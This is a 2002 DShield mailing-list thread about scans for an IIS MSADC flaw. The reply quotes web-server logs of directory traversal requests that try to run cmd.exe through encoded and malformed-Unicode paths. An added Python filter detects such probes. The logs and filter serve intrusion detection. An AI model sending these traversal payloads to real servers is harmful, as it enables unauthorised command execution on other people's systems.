[Dshield] RE: scans for MSADC bug?

Sue Young smy at gcmlp.com
Mon Nov 25 16:42:17 GMT 2002


You mean this?

2002-11-25 09:48:56 80.128.177.24 - xxx.xxx.xxx.xxx 80 HEAD
/msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-11-25 09:48:57 80.128.177.24 - xxx.xxx.xxx.xxx 80 HEAD
/msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-11-25 09:48:57 80.128.177.24 - xxx.xxx.xxx.xxx 80 HEAD
/msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-11-25 09:49:01 80.128.177.24 - xxx.xxx.xxx.xxx 80 HEAD
/msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-11-25 09:49:01 80.128.177.24 - xxx.xxx.xxx.xxx 80 HEAD
/msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-11-25 09:49:01 80.128.177.24 - xxx.xxx.xxx.xxx 80 HEAD
/msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-11-25 09:49:02 80.128.177.24 - xxx.xxx.xxx.xxx 80 HEAD
/msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-11-25 09:49:02 80.128.177.24 - xxx.xxx.xxx.xxx 80 HEAD
/msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-11-25 09:49:04 80.128.177.24 - xxx.xxx.xxx.xxx 80 HEAD
/msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-11-25 09:49:07 80.128.177.24 - xxx.xxx.xxx.xxx 80 HEAD
/msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-11-25 09:49:07 80.128.177.24 - xxx.xxx.xxx.xxx HEAD
/msadc/..%5c../..%5c../..%c/..Á
../..Á
../..Á
../winnt/system32/cmd.exe
/c+dir+c:\ 500 -
2002-11-25 09:49:07 80.128.177.24 - xxx.xxx.xxx.xxx 80 HEAD
/msadc/..À/..À/winnt/system32/cmd.exe /c+dir+c:\ 404 -
2002-11-25 09:49:09 80.128.177.24 - xxx.xxx.xxx.xxx 80 HEAD
/msadc/winnt/system32/cmd.exe /c+dir+c:\ 404 -

-----Original Message-----
From: Johannes Ullrich [mailto:jullrich at euclidian.com] 
Sent: Thursday, November 21, 2002 7:49 PM
To: intrusions at incidents.org; list at dshield.org
Subject: scans for MSADC bug?



We got some anecdotal evidence (IMs from a couple of people) that looks like
there are scans for the latest MSFT 'msadc' bug. Can everyone take a good
look at their web logs and see if they find anything suspicious?

(and if you haven't patched your IIS servers, see if you have any odd
outbound traffic going on).


-- 
--------------------------------------------------------------------
jullrich at euclidian.com             Collaborative Intrusion Detection
                                         join http://www.dshield.org
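
Added example, not part of the original thread or any DShield tooling: a small Python filter for the kind of web-log review requested above. It percent-decodes each URI stem, folds backslashes to slashes, and flags traversal sequences, 0xC0/0xC1 bytes (which never occur in valid UTF-8 and display as À/Á in Latin-1), and requests for cmd.exe. The field order and the sample lines are assumptions constructed to match the layout of the log excerpt in the reply.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample (not from the post). Assumed field order, as in the excerpt:
# date time c-ip user s-ip port method uri-stem uri-query status
SAMPLE_LOG = """\
2002-11-25 09:48:56 192.0.2.10 - 198.51.100.5 80 HEAD /msadc/..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\\ 500 -
2002-11-25 09:49:07 192.0.2.10 - 198.51.100.5 80 HEAD /msadc/..%c0/..%c0/winnt/system32/cmd.exe /c+dir+c:\\ 404 -
2002-11-25 09:49:09 192.0.2.10 - 198.51.100.5 80 HEAD /msadc/winnt/system32/cmd.exe /c+dir+c:\\ 404 -
2002-11-25 09:50:12 192.0.2.77 - 198.51.100.5 80 GET /docs/release%20notes.htm - 200 -
"""

def normalise(stem: str) -> bytes:
    """Percent-decode until stable (at most 3 rounds), fold '\\' to '/', lowercase."""
    raw = stem.encode("latin-1", "replace")
    for _ in range(3):
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw = decoded
    return raw.replace(b"\\", b"/").lower()

def classify(stem: str) -> list[str]:
    """Return the reasons a URI stem looks like a traversal probe (empty if none)."""
    path = normalise(stem)
    reasons = []
    if b"../" in path:
        reasons.append("traversal")
    if re.search(rb"[\xc0\xc1]", path):  # bytes that never occur in valid UTF-8
        reasons.append("invalid-utf8")
    if path.endswith(b"/cmd.exe"):
        reasons.append("cmd.exe")
    return reasons

def scan(log_text: str) -> list[dict]:
    """Return one record per suspicious request, keeping the status for triage."""
    hits = []
    for line in log_text.splitlines():
        f = line.split()
        if line.startswith("#") or len(f) < 10 or not f[9].isdigit():
            continue
        reasons = classify(f[7])
        if reasons:
            hits.append({"client": f[2], "stem": f[7], "status": int(f[9]), "reasons": reasons})
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["client"], hit["status"], ",".join(hit["reasons"]), hit["stem"])
```

A flagged request that returned a 2xx status deserves closer attention than the 404 and 500 responses seen in the excerpt.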



